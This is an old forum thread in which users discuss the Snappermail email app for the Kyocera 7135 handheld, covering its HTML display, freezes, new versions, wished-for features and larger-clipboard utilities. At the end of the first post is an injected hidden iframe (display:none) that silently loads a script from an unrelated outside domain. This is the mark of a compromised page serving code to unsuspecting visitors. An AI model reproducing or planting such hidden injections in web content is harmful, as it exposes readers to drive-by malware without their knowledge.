+ Reply to Thread

Snappermail question

OK, you guys convinced me to get Snappermail, and at first blush I like it way better than In-Box-To-Go. However, when I try to read certain emails, they have all of the formating codes. How do I set a view so that I can get rid of that? Please????<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The present version of Snappermail apparently cannot handle HTML code and this is most likely what you are seeing. Others have said that the next version, which is supposedly "around the corner" will be able to handle HTML. Until then, you either have to work your way down the e-mail to find the message or use a different e-mail app for HTML e-mail. The standard Eudora that comes with the 7135 does handle HTML, but doesn't handle attachments. If it's not one thing, it's another.

Rats. Other than that it looks like a great program....
    Thanks for the info

Snappermail locks up on me every time it tries to disconnect. My 7135 freezes up (no screen of death, just a frozen screen), the green connect light stays lit, the red phone button doesn't work to disconnect, and the only thing I can do is soft reset to force a disconnect.

Any ideas?

Originally posted by Lnoble
    Thethe next version, which is supposedly "around the corner" will be able to handle HTML.
    The new version with HTML support was released this week and is available on Snappermail's site.

Originally posted by ogakor
    The new version with HTML support was released this week and is available on Snappermail's site.
    HTML support was available in version 1.7.x (released quite a while ago). The version released this week is v1.8.x. It has much improved message viewing speed amongst quite a few other fixes and enhancements. SM is an excellent program!
    Michael

Originally posted by Michael Rye
    SM is an excellent program!
    Right now I'd rank it as my #1 app! Especially when combined with Quickoffice Premier!
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Robert K.
    Right now I'd rank it as my #1 app! Especially when combined with Quickoffice Premier!
    My vote: Snappermail with Hotpop or Softhome's free email service... to replace Eudura and Airbridge.

I only wish I'd purchased lifetime upgrades when it was available. Here are the enhancements I'd like:

1. Ability to file email within the email itself. (minor thing)
    2. Ability to create HTML in QO and copy/paste with HTML (highlighting & color) characteristics in the email so it will be not sent as an attachment.
    3. Ability to send/attach calendar, address, and todo data as TEXT in addition to .vcs files. (Don't want to cut/paste into the email.)
    4. Ability to send/receive voice recording memos to other devices!

Originally posted by Beryl
    I only wish I'd purchased lifetime upgrades when it was available.
    I'm really glad I did... and back when it was $54.99

The biggest feature I want right now is e-mail filters, along with a default SM startup screen that shows number of e-mails read vs. unread for each folder

It's nice that they now allow you to direct different POP accounts to their own folders... but I don't want to have to go into each folder just to see what is new.
    Please visit my picture site: Robert-O-Rama :)

Can Snappermail read or write the text of a long email to a Palm file - Memo if need be, but better yet DOC. I'm looking for something longer than the 1K clipboard for transferring.

Originally posted by gellmanb
    Can Snappermail read or write the text of a long email to a Palm file - Memo if need be, but better yet DOC. I'm looking for something longer than the 1K clipboard for transferring.
    I also needed a bigger clipboard and looked around for months. The solution is Clipper. $12 with a 30 day free trial at www.standalone.com

Originally posted by ogakor
    I also needed a bigger clipboard and looked around for months. The solution is Clipper. $12 with a 30 day free trial at www.standalone.com
    An alternative that I recommend for only $2 more ($14) is LapTopHack from PaulComputing. It expands the clipboard to 32 KB (32,768 bytes) and adds a huge number of other features. I use it all the time with my 7135 and portable keyboard. Accessing menus from the keyboard is the feature I like best. Check it out, it's great!
    Michael